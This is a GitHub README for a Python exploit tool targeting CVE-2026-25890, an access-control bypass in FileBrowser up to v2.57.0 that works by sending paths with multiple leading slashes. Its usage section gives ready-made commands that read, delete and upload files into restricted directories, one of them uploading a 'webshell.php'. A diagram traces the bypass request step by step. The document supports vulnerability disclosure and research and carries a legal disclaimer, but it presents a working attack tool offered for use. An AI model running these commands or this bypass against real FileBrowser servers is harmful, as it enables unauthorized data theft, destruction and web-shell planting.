# CVE-2026-25890 - FileBrowser Access Control Bypass
![Author](https://img.shields.io/badge/Author-Mohammed%20Idrees%20Banyamer-red)
![GitHub license](https://img.shields.io/github/license/banyamer/CVE-2026-25890-FileBrowser-Bypass?style=flat-square)
![Python version](https://img.shields.io/badge/python-3.8%2B-blue?style=flat-square)
![CVE](https://img.shields.io/badge/CVE-2026--25890-critical?style=flat-square&logo=cve&logoColor=white&color=darkred)
![Exploit-DB](https://img.shields.io/badge/Exploit%20Type-Remote-orange?style=flat-square)
![Tested on](https://img.shields.io/badge/Tested%20on-Linux%20%2F%20Docker-success?style=flat-square)

**Unauthenticated users cannot exploit this — requires valid low-privileged credentials that are restricted from the target path.**

Path-based authorization bypass in FileBrowser ≤ v2.57.0 using multiple leading slashes (`//private` instead of `/private`) to evade `strings.HasPrefix()` checks while the filesystem still serves the canonical path.

Fixed in **v2.57.1** (commit `489af403...` – removed `r.SkipClean(true)`).

## 📦 Features

- Read restricted files
- Upload files into restricted directories
- Delete restricted files
- Custom number of leading slashes for bypass testing
- Save leaked files locally
- Verbose content preview
- Clean CLI with argparse

## 🛠️ Installation

```bash
# Clone the repository
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# No dependencies beyond standard library + requests
pip install requests
```

## 🚀 Usage

```bash
python3 exploit.py --help
```

### Basic examples

```bash
# Read a restricted file
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
```

```bash
# Upload malicious file into restricted folder
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
```

```bash
# Delete a restricted file
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4
```

## 📊 PoC Attack Flow

```mermaid
sequenceDiagram
    participant Attacker
    participant FileBrowser ≤ v2.57.0
    participant Gorilla Mux Router
    participant Auth Middleware
    participant Filesystem Handler

    Attacker->>FileBrowser: GET /api/resources/private/secret.txt<br>(normal request)
    FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
    Gorilla Mux->>Auth Middleware: path = "/private/secret.txt"
    Auth Middleware->>Auth Middleware: strings.HasPrefix("/private/secret.txt", disallowed="/private") → true
    Auth Middleware->>Attacker: 403 Forbidden

    Note over Attacker,FileBrowser: Attacker tries bypass

    Attacker->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → no normalization)
    Gorilla Mux->>Auth Middleware: path = "//private/secret.txt"
    Auth Middleware->>Auth Middleware: HasPrefix("//private/secret.txt", "/private") → false
    Auth Middleware->>Filesystem Handler: Allowed → proceed
    Filesystem Handler->>Filesystem: Normalizes // → /private/secret.txt
    Filesystem->>Filesystem Handler: Returns file content
    Filesystem Handler->>Attacker: 200 OK + secret content
```

## ⚠️ Legal & Ethical Disclaimer

> This proof-of-concept is provided **strictly for educational and security research purposes**.  
> Do **not** use this code against any system without **explicit written permission** from the owner.  
> Unauthorized access or modification of systems is illegal under most jurisdictions (e.g. CFAA, Computer Misuse Act).

## 📜 References

- [GitHub Advisory GHSA-4mh3-h929-w968](https://github.com/filebrowser/filebrowser/security/advisories/GHSA-4mh3-h929-w968)
- [Fix Commit](https://github.com/filebrowser/filebrowser/commit/489af403a19057f6b6b4b1dc0e48cbb26a202ef9)
- [Release v2.57.1](https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1)

## ❤️ Credits

Exploit Author: **Mohammed Idrees Banyamer**  
Country: Jordan  
Instagram: [@banyamer_security](https://instagram.com/banyamer_security)

Star ⭐ the repo if you find it useful!

---
Last updated: February 2026

